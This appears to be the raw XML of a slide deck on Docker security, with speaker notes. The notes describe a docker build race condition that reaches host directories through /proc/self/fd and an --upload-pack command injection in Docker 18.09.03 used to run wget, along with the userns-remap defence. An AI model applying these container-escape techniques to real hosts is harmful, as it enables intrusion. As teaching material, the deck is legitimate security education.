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83"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId84"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="345" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="294" r:id="rId6"/>
    <p:sldId id="346" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="339" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="272" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="264" r:id="rId21"/>
    <p:sldId id="275" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="281" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="350" r:id="rId28"/>
    <p:sldId id="351" r:id="rId29"/>
    <p:sldId id="352" r:id="rId30"/>
    <p:sldId id="353" r:id="rId31"/>
    <p:sldId id="354" r:id="rId32"/>
    <p:sldId id="355" r:id="rId33"/>
    <p:sldId id="356" r:id="rId34"/>
    <p:sldId id="262" r:id="rId35"/>
    <p:sldId id="283" r:id="rId36"/>
    <p:sldId id="284" r:id="rId37"/>
    <p:sldId id="286" r:id="rId38"/>
    <p:sldId id="287" r:id="rId39"/>
    <p:sldId id="288" r:id="rId40"/>
    <p:sldId id="290" r:id="rId41"/>
    <p:sldId id="263" r:id="rId42"/>
    <p:sldId id="292" r:id="rId43"/>
    <p:sldId id="291" r:id="rId44"/>
    <p:sldId id="293" r:id="rId45"/>
    <p:sldId id="296" r:id="rId46"/>
    <p:sldId id="299" r:id="rId47"/>
    <p:sldId id="297" r:id="rId48"/>
    <p:sldId id="300" r:id="rId49"/>
    <p:sldId id="301" r:id="rId50"/>
    <p:sldId id="348" r:id="rId51"/>
    <p:sldId id="308" r:id="rId52"/>
    <p:sldId id="261" r:id="rId53"/>
    <p:sldId id="309" r:id="rId54"/>
    <p:sldId id="310" r:id="rId55"/>
    <p:sldId id="311" r:id="rId56"/>
    <p:sldId id="312" r:id="rId57"/>
    <p:sldId id="313" r:id="rId58"/>
    <p:sldId id="314" r:id="rId59"/>
    <p:sldId id="315" r:id="rId60"/>
    <p:sldId id="322" r:id="rId61"/>
    <p:sldId id="323" r:id="rId62"/>
    <p:sldId id="324" r:id="rId63"/>
    <p:sldId id="325" r:id="rId64"/>
    <p:sldId id="357" r:id="rId65"/>
    <p:sldId id="358" r:id="rId66"/>
    <p:sldId id="359" r:id="rId67"/>
    <p:sldId id="316" r:id="rId68"/>
    <p:sldId id="317" r:id="rId69"/>
    <p:sldId id="318" r:id="rId70"/>
    <p:sldId id="319" r:id="rId71"/>
    <p:sldId id="320" r:id="rId72"/>
    <p:sldId id="321" r:id="rId73"/>
    <p:sldId id="340" r:id="rId74"/>
    <p:sldId id="349" r:id="rId75"/>
    <p:sldId id="327" r:id="rId76"/>
    <p:sldId id="328" r:id="rId77"/>
    <p:sldId id="334" r:id="rId78"/>
    <p:sldId id="341" r:id="rId79"/>
    <p:sldId id="347" r:id="rId80"/>
    <p:sldId id="342" r:id="rId81"/>
    <p:sldId id="335" r:id="rId82"/>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5D3F6-684F-297E-B3A7-6E315E5F915B}" v="1" dt="2024-04-09T21:44:12.735"/>
    <p1510:client id="{33DDE121-BE12-AAC9-5006-A138F162FCD8}" v="726" dt="2024-04-10T02:27:14.394"/>
    <p1510:client id="{52FD14BE-5158-422C-09D2-6BEA7023A885}" v="161" dt="2024-04-09T21:45:14.375"/>
    <p1510:client id="{69A40153-D411-65BE-9575-5B19EA269E6C}" v="47" dt="2024-04-09T18:22:13.885"/>
    <p1510:client id="{6EA8F54D-17C3-70F4-92F8-A26A41D0C393}" v="2" dt="2024-04-09T17:50:06.356"/>
    <p1510:client id="{87852256-9D7B-DBFA-0789-6093261BACD5}" v="1080" dt="2024-04-10T03:26:52.110"/>
    <p1510:client id="{9344602A-20C7-4846-85DE-B114595C9215}" v="13" dt="2024-04-09T04:07:32.352"/>
    <p1510:client id="{EA23A736-0EF9-50DE-918D-FF7210C045A5}" v="36" dt="2024-04-09T21:17:20.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0F2A07-C893-BF54-BFD5-055748C1E2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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C24095-D02B-2FDA-08B8-4405758042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2BE12E-05E6-4742-A686-655062BAC0F7}" type="datetimeFigureOut">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>04/09/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AAE3D90-6D12-EAEE-818F-0D25B6C7D2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5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20795CE0-454C-7456-FB80-CCD368A2A8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8607FD-BD86-B547-BC21-9CF0E9AA1BF1}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143922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478EC-5541-2648-9086-FD001710585C}" type="datetimeFigureOut">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>04/09/2024</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5B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281667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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2659856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7, we can see that /proc is being mounted before the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> call, which is potentially interesting. Inside the proc mount, the directory /proc/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> contains ‘magic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>symlinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>’ to the file descriptors open by our current process. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Therefore, if any of the file descriptors with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> numbers 3 through 10 (not including 6, as that is explicitly closed) are a handle to a directory outside our root filesystem, we can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> to retain access to such a directory, even after the file descriptor is closed on exec.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19724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build will perform a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> operation before some file descriptors to the "outside world" are closed. We can control the path used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and, therefore, using the /proc/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> directory, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> into this still-open file descriptor. This is made possible because the call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> happens in the time window between when /proc is mounted and the /proc/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> file descriptors are closed on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> when the RUN directive is executed, hence the race condition.</a:t>
            </a:r>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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2880232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build will perform a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> operation before some file descriptors to the "outside world" are closed. We can control the path used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and, therefore, using the /proc/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> directory, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> into this still-open file descriptor. This is made possible because the call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> happens in the time window between when /proc is mounted and the /proc/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> file descriptors are closed on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> when the RUN directive is executed, hence the race condition.</a:t>
            </a:r>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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385524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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40265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There is a file called “/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docker.service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” that is a configuration file for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, the system and service manager for Linux systems. It specifies how the Docker service should be managed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, including its startup behavior, dependencies, and other settings.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA"/>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If we run the docker daemon with its normal configuration without activating the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA"/>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Now, if we want to access the API like before in the attacking section, we can not do that. For the attacking part</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69045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We saw in the attack part that a user within a container can run as root (id=0), which can map the root user on the host as well. For example, if we can see below: </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Running a container, and after executing an attack, we can confirm that the user running that command is root, on both the container and the host. </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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418933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By using the “default” value, docker will use the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dockremap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” user and group to make the remapping. It is also possible to create a custom user, but here we are using default mechanism to show the way around to solve this problem. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3220389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Now, if we want to verify whether the user “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dockremap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” was actually created by the docker or not. We can also see if it is remapped or not by inspecting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>subuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>subgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SubUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/GIDs are a range subordinate user/group IDs that a user is allowed to use.).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="654273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Now, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>userns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-remap feature can be checked by running a container and inspecting the user inside it and the user mapped into the host. The user should be root in the container, mapped to id 165536 in the host. If we run the command like before</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4218387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From the attack perspective, we saw that the docker build vulnerability can be exploited in docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>18.09.03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> version. If we see below, in the docker version we can run commands according to use in --upload-pack=” “ command. And we can run commands by using the vulnerability, like here is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> command we are successfully executing using docker build vulnerability. </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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399110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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1020587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From the attack perspective, we saw that the docker build vulnerability can be exploited in docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>18.09.03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> version. If we see below, in the docker version we can run commands according to use in --upload-pack=” “ command. And we can run commands by using the vulnerability, like here is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> command we are successfully executing using docker build vulnerability. </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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
